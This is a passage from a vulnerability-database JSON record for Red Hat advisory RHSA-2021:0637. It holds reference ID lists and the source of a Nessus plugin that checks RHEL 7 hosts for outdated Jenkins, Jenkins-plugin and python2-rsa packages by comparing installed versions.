"ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU.NASL", "PHOTONOS_PHSA-2020-3_0-0099_APACHE.NASL", "EULEROS_SA-2020-2327.NASL", "FREEBSD_PKG_6D5F1B0BB86548D5935B3FB6EBB425FC.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "FEDORA_2020-52741B0A49.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2021-0034.NASL", "GENTOO_GLSA-202007-34.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "UBUNTU_USN-4380-1.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JUL_2020.NASL", "FEDORA_2020-2640AA4E19.NASL", "GENTOO_GLSA-202011-18.NASL", "EULEROS_SA-2020-2132.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2021.NASL", "ORACLE_BPM_CPU_OCT_2020.NASL", "PHOTONOS_PHSA-2020-1_0-0298_APACHE.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2021.NASL", "REDHAT-RHSA-2021-0038.NASL", "REDHAT-RHSA-2020-5634.NASL", "EULEROS_SA-2020-1915.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL"]}, {"type": "redhat", "idList": ["RHSA-2021:0423", "RHSA-2020:2618", "RHSA-2021:0038", "RHSA-2021:0719", "RHSA-2021:0281", "RHSA-2020:4961", "RHSA-2020:4960", "RHSA-2021:0282", "RHSA-2020:5633", "RHSA-2020:5635", "RHSA-2021:0039", "RHSA-2021:0637", "RHSA-2021:0037", "RHSA-2020:5634", "RHSA-2021:0429", "RHSA-2021:0034"]}, {"type": "cve", "idList": ["CVE-2020-2304", "CVE-2020-2306", "CVE-2020-25658", "CVE-2020-2307", "CVE-2020-11979", "CVE-2020-2305", "CVE-2020-1945", "CVE-2020-2308", "CVE-2020-2309"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-25658", "UB:CVE-2020-11979"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5"]}, {"type": "fedora", "idList": ["FEDORA:2D51F60C28B2", "FEDORA:569CE30E400B", "FEDORA:146FE30DD5E7", "FEDORA:6869030D3139", "FEDORA:28DBA30C999B", "FEDORA:046CF30C99A1", "FEDORA:52396606732B", "FEDORA:88EAA30905CF"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-XRX6-FMXQ-RJJ2", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "photon", "idList": ["PHSA-2021-4.0-0036", "PHSA-2020-3.0-0155", "PHSA-2020-1.0-0335", "PHSA-2020-1.0-0298", "PHSA-2020-2.0-0247", "PHSA-2020-2.0-0291", "PHSA-2020-3.0-0099"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJUL2021"]}], "modified": "2021-08-19T12:06:10", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-08-19T12:06:10", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 59, 79, 200, 377, 385, 502, 611, 770, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:jenkins", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins", "p-cpe:/a:redhat:enterprise_linux:python2-rsa"], "solution": "Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-11979", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T12:06:10", "differentElements": ["modified", "sourceData"], "edition": 9}], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2021-21610", "RH:CVE-2020-2307", "RH:CVE-2020-11979", "RH:CVE-2021-21609", "RH:CVE-2020-2304", "RH:CVE-2021-21603", "RH:CVE-2021-21602", "RH:CVE-2020-2308", "RH:CVE-2021-21607", "RH:CVE-2020-1945", "RH:CVE-2021-21604", "RH:CVE-2021-21605", "RH:CVE-2021-21611", "RH:CVE-2020-2306", "RH:CVE-2020-2309", "RH:CVE-2020-2305", "RH:CVE-2020-25658", "RH:CVE-2021-21606", "RH:CVE-2021-21608"]}, {"type": "redhat", "idList": ["RHSA-2021:0719", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2021:0429", "RHSA-2021:0034", "RHSA-2020:5634", "RHSA-2021:0637", "RHSA-2021:0037", "RHSA-2020:5633", "RHSA-2021:0038", "RHSA-2021:0039", "RHSA-2020:2618", "RHSA-2021:0281", "RHSA-2020:5635", "RHSA-2021:0282", "RHSA-2020:4961"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2021-0034.NASL", "REDHAT-RHSA-2021-0038.NASL", "PHOTONOS_PHSA-2020-3_0-0099_APACHE.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "REDHAT-RHSA-2020-5634.NASL", "OPENSUSE-2020-1022.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2021-0423.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JUL_2020.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "EULEROS_SA-2020-2327.NASL", "FREEBSD_PKG_6D5F1B0BB86548D5935B3FB6EBB425FC.NASL", "ORACLE_BPM_CPU_OCT_2020.NASL", "FEDORA_2020-2640AA4E19.NASL", "EULEROS_SA-2020-1794.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "GENTOO_GLSA-202011-18.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-52741B0A49.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2021.NASL", "EULEROS_SA-2020-1915.NASL", "GENTOO_GLSA-202007-34.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "UBUNTU_USN-4380-1.NASL", "PHOTONOS_PHSA-2020-1_0-0298_APACHE.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2021.NASL", "FEDORA_2020-7F07DA3FEF.NASL", "FEDORA_2020-92B1D001B3.NASL", "EULEROS_SA-2020-2132.NASL"]}, {"type": "cve", "idList": ["CVE-2020-2309", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2304", "CVE-2020-25658"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979", "UB:CVE-2020-25658"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5"]}, {"type": "fedora", "idList": ["FEDORA:88EAA30905CF", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:569CE30E400B", "FEDORA:28DBA30C999B", "FEDORA:046CF30C99A1"]}, {"type": "github", "idList": ["GHSA-XRX6-FMXQ-RJJ2", "GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "photon", "idList": ["PHSA-2020-1.0-0335", "PHSA-2020-2.0-0247", "PHSA-2020-1.0-0298", "PHSA-2020-3.0-0099", "PHSA-2020-2.0-0291", "PHSA-2020-3.0-0155", "PHSA-2021-4.0-0036"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUJUL2021", "ORACLE:CPUJAN2021"]}], "modified": "2021-10-07T23:48:09", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-10-07T23:48:09", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/07\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", 